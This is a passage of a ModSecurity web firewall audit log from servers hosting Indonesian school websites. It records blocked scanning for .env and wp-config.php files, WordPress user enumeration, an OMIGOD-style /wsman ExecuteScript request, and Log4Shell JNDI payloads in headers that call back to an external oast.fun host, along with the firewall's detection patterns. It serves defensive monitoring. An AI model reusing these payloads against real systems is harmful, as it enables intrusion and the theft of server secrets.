Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f086f83c-Z-- --08d5656a-A-- [21/May/2025:19:17:19 +0700] aC3ETyioYDAgD0WHUjQJuAAAAFg 103.236.140.4 46904 103.236.140.4 8181 --08d5656a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.156.92.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.156.92.159 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --08d5656a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08d5656a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747829839014453 763 (- - -) Stopwatch2: 1747829839014453 763; combined=311, p1=266, p2=0, p3=0, p4=0, p5=44, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08d5656a-Z-- --65e52605-A-- [21/May/2025:19:48:05 +0700] aC3LhXZGSt58M5vv3gnz8wAAABc 103.236.140.4 57666 103.236.140.4 8181 --65e52605-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.82.171.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.82.171.234 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --65e52605-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65e52605-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747831685709144 4359 (- - -) Stopwatch2: 1747831685709144 4359; combined=2324, p1=606, p2=1683, p3=0, p4=0, p5=34, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65e52605-Z-- --9ce22950-A-- [21/May/2025:20:25:29 +0700] aC3USSioYDAgD0WHUjQiEwAAAFc 103.236.140.4 56452 103.236.140.4 8181 --9ce22950-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --9ce22950-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ce22950-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747833929343866 782 (- - -) Stopwatch2: 1747833929343866 782; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ce22950-Z-- --7d7edf59-A-- [21/May/2025:20:39:25 +0700] aC3XjXZGSt58M5vv3gkEVwAAABA 103.236.140.4 38290 103.236.140.4 8181 --7d7edf59-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.160.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.160.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7d7edf59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d7edf59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747834765681940 3111 (- - -) Stopwatch2: 1747834765681940 3111; combined=1257, p1=433, p2=798, p3=0, p4=0, p5=26, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d7edf59-Z-- --b3216e3d-A-- [21/May/2025:21:00:26 +0700] aC3cenZGSt58M5vv3gkLuQAAABg 103.236.140.4 53738 103.236.140.4 8181 --b3216e3d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --b3216e3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3216e3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747836026317639 806 (- - -) Stopwatch2: 1747836026317639 806; combined=322, p1=274, p2=0, p3=0, p4=0, p5=47, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3216e3d-Z-- --960af14e-A-- [21/May/2025:21:09:04 +0700] aC3egBpv_mIXt2pDBOqOGgAAAMY 103.236.140.4 54084 103.236.140.4 8181 --960af14e-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 168397115 --960af14e-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --960af14e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --960af14e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747836544107392 3144 (- - -) Stopwatch2: 1747836544107392 3144; combined=2166, p1=448, p2=1649, p3=20, p4=23, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --960af14e-Z-- --d25f2c67-A-- [21/May/2025:21:17:19 +0700] aC3gbyioYDAgD0WHUjQxNQAAAFY 103.236.140.4 43234 103.236.140.4 8181 --d25f2c67-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.241.80.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.241.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d25f2c67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d25f2c67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747837039704175 2550 (- - -) Stopwatch2: 1747837039704175 2550; combined=1177, p1=418, p2=733, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d25f2c67-Z-- --25d94542-A-- [21/May/2025:21:37:42 +0700] aC3lNiioYDAgD0WHUjQ3jQAAAEw 103.236.140.4 54170 103.236.140.4 8181 --25d94542-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.210.221.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.210.221.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --25d94542-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25d94542-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747838262228388 2580 (- - -) Stopwatch2: 1747838262228388 2580; combined=1337, p1=459, p2=849, p3=0, p4=0, p5=29, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25d94542-Z-- --a6bcab6c-A-- [21/May/2025:22:23:35 +0700] aC3v9yioYDAgD0WHUjQ_pAAAAEM 103.236.140.4 50920 103.236.140.4 8181 --a6bcab6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --a6bcab6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6bcab6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747841015997322 930 (- - -) Stopwatch2: 1747841015997322 930; combined=347, p1=308, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6bcab6c-Z-- --70ddbb1b-A-- [21/May/2025:23:45:29 +0700] aC4DKSioYDAgD0WHUjRBhQAAAFU 103.236.140.4 33696 103.236.140.4 8181 --70ddbb1b-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 168506107 --70ddbb1b-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --70ddbb1b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --70ddbb1b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747845929246391 2633 (- - -) Stopwatch2: 1747845929246391 2633; combined=1800, p1=457, p2=1286, p3=17, p4=20, p5=20, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70ddbb1b-Z-- --b0f38835-A-- [22/May/2025:00:09:21 +0700] aC4IwXZGSt58M5vv3gkzpgAAAAQ 103.236.140.4 34608 103.236.140.4 8181 --b0f38835-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b0f38835-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0f38835-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747847361490218 2482 (- - -) Stopwatch2: 1747847361490218 2482; combined=1363, p1=435, p2=896, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0f38835-Z-- --a386ae3b-A-- [22/May/2025:00:24:56 +0700] aC4MaCioYDAgD0WHUjRCsQAAAEg 103.236.140.4 35448 103.236.140.4 8181 --a386ae3b-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; LGMS428) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --a386ae3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a386ae3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848296381344 905 (- - -) Stopwatch2: 1747848296381344 905; combined=415, p1=376, p2=0, p3=0, p4=0, p5=39, sr=152, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a386ae3b-Z-- --2482d342-A-- [22/May/2025:00:29:19 +0700] aC4Nb4v3pT1iV0OxjLSDOQAAAJQ 103.236.140.4 36840 103.236.140.4 8181 --2482d342-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.80.250 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.80.250 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2482d342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2482d342-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848559379696 1152 (- - -) Stopwatch2: 1747848559379696 1152; combined=367, p1=322, p2=0, p3=0, p4=0, p5=45, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2482d342-Z-- --16366812-A-- [22/May/2025:00:29:19 +0700] aC4Nb4v3pT1iV0OxjLSDOgAAAJY 103.236.140.4 36842 103.236.140.4 8181 --16366812-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.80.250 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.80.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --16366812-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16366812-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848559401577 683 (- - -) Stopwatch2: 1747848559401577 683; combined=260, p1=228, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16366812-Z-- --727f1045-A-- [22/May/2025:00:30:22 +0700] aC4Nrov3pT1iV0OxjLSDkAAAAII 103.236.140.4 37246 103.236.140.4 8181 --727f1045-B-- GET /?x=${jndi:ldap://${:-847}${:-283}.${hostName}.uri.d0mbkqa4kqtm561jt3n0zm9wt341cgq3j.oast.fun/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/107.0 Safari/537.36 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 168466871 --727f1045-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --727f1045-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747848622526697 5774 (- - -) Stopwatch2: 1747848622526697 5774; combined=3916, p1=445, p2=3436, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --727f1045-Z-- --2d2f0235-A-- [22/May/2025:00:30:26 +0700] aC4Nsov3pT1iV0OxjLSDmQAAAI0 103.236.140.4 37298 103.236.140.4 8181 --2d2f0235-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-847}${:-283}.${hostName}.referer.d0mbkqa4kqtm561jt3n0kkx9f1xz1g4ys.oast.fun} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-847}${:-283}.${hostName}.useragent.d0mbkqa4kqtm561jt3n0dinffo6f45mxw.oast.fun} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-847}${:-283}.${hostName}.accept.d0mbkqa4kqtm561jt3n08ewrb6qw3c4ra.oast.fun} Accept-Language: ${jndi:ldap://${:-847}${:-283}.${hostName}.acceptlanguage.d0mbkqa4kqtm561jt3n0ggecbbfq96mkz.oast.fun} Access-Control-Request-Headers: ${jndi:ldap://${:-847}${:-283}.${hostName}.accesscontrolrequestheaders.d0mbkqa4kqtm561jt3n0stzbypax9ufjo.oast.fun} Access-Control-Request-Method: ${jndi:ldap://${:-847}${:-283}.${hostName}.accesscontrolrequestmethod.d0mbkqa4kqtm561jt3n0tfzc8dcjo5otf.oast.fun} Authentication: Bearer ${jndi:ldap://${:-847}${:-283}.${hostName}.authenticationbearer.d0mbkqa4kqtm561jt3n04kskxdod68hfp.oast.fun} Location: ${jndi:ldap://${:-847}${:-283}.${hostName}.location.d0mbkqa4kqtm561jt3n0a6xp18c9x51wm.oast.fun} Origin: ${jndi:ldap://${:-847}${:-283}.${hostName}.origin.d0mbkqa4kqtm561jt3n039nxdxwop9r9c.oast.fun} Upgrade-Insecure-Requests: ${jndi:ldap://${:-847}${:-283}.${hostName}.upgradeinsecurerequests.d0mbkqa4kqtm561jt3n0qiu1efs44irha.oast.fun} X-Api-Version: ${jndi:ldap://${:-847}${:-283}.${hostName}.xapiversion.d0mbkqa4kqtm561jt3n0ekuz1pqxnw5sh.oast.fun} X-CSRF-Token: ${jndi:ldap://${:-847}${:-283}.${hostName}.xcsrftoken.d0mbkqa4kqtm561jt3n0hg5p5ztw5oqqr.oast.fun} X-Druid-Comment: 
